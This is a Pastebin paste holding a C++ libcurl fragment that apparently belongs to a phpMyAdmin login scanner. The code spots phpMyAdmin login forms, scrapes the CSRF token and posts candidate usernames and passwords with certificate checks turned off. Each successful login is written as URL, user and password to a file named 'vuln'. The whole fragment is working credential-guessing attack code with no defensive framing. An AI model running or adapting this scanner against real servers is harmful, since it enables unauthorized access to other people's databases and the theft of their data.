Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- else if(strstr(chunk.memory,"HTTP/1.1 200 OK") && strstr(chunk.memory,"name=\"pma_username\"") && strstr(chunk.memory,"name=\"pma_password\""))
- {
- std::string s1(chunk.memory);
- string delimiter1 = "name=\"token\"";
- string token1 = s1.substr(52, s1.find(delimiter1)); // token is "scott"
- token1 = s1.substr(s1.find(delimiter1)+20,32);
- // it is a box, post it
- curl_easy_setopt(curl_handle, CURLOPT_URL, url);
- curl_easy_setopt(curl_handle, CURLOPT_FOLLOWLOCATION, 1L); // caused problems
- curl_easy_setopt(curl_handle, CURLOPT_TIMEOUT, timeout);
- curl_easy_setopt(curl_handle, CURLOPT_CONNECTTIMEOUT, timeout);
- curl_easy_setopt(curl_handle, CURLOPT_WRITEFUNCTION, WriteMemoryCallback);
- curl_easy_setopt(curl_handle, CURLOPT_WRITEDATA, (void *)&chunk);
- curl_easy_setopt(curl_handle, CURLOPT_USERAGENT,USERAGENT);
- // curl_easy_setopt(curl_handle, CURLOPT_CONNECT_TO,host);
- curl_easy_setopt(curl_handle, CURLOPT_HEADER, 1l);
- curl_easy_setopt(curl_handle, CURLOPT_SSL_VERIFYHOST, 0l);
- curl_easy_setopt(curl_handle, CURLOPT_SSL_VERIFYPEER,0l);
- // curl_easy_setopt(curl_handle, CURLOPT_USE_SSL, 0l);
- // curl_easy_setopt(curl_handle, CURLOPT_SSLVERSION, CURL_SSLVERSION_MAX_TLSv1_2);
- curl_easy_setopt(curl_handle, CURLOPT_COOKIEFILE, "");
- char post_string[500];
- memset(post_string,0,500);
- sprintf(post_string,"pma_username=%s&pma_password=%s&server=%s&token=%s",user,pass,"1",token1.c_str());
- curl_easy_setopt(curl_handle,CURLOPT_POSTFIELDS,post_string);
- if(debug_curl >=3) curl_easy_setopt(curl_handle, CURLOPT_VERBOSE, 1);
- res = curl_easy_perform(curl_handle);
- if(res != CURLE_OK)
- {
- curl_error = (char*) curl_easy_strerror(res);
- if(debug_curl >=3) fprintf(stderr, "curl_easy_perform() failed: %s\n",curl_error);
- }
- else
- {
- if(debug_curl >=3) printf("%lu bytes retrieved\n", (long)chunk.size);
- if(debug_curl >=3) puts(chunk.memory);
- if(strstr(chunk.memory,"HTTP/1.1 200 OK") && strstr(chunk.memory,"themes/pmahomme/img/logo_left.png"))
- {
- result = 1;
- char temp_filename_line[500];
- memset(temp_filename_line,0,500);
- sprintf(temp_filename_line,"%s:%s:%s\n",url,user,pass);
- file_put_contents("vuln",temp_filename_line,"FILE_APPEND");
- }
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement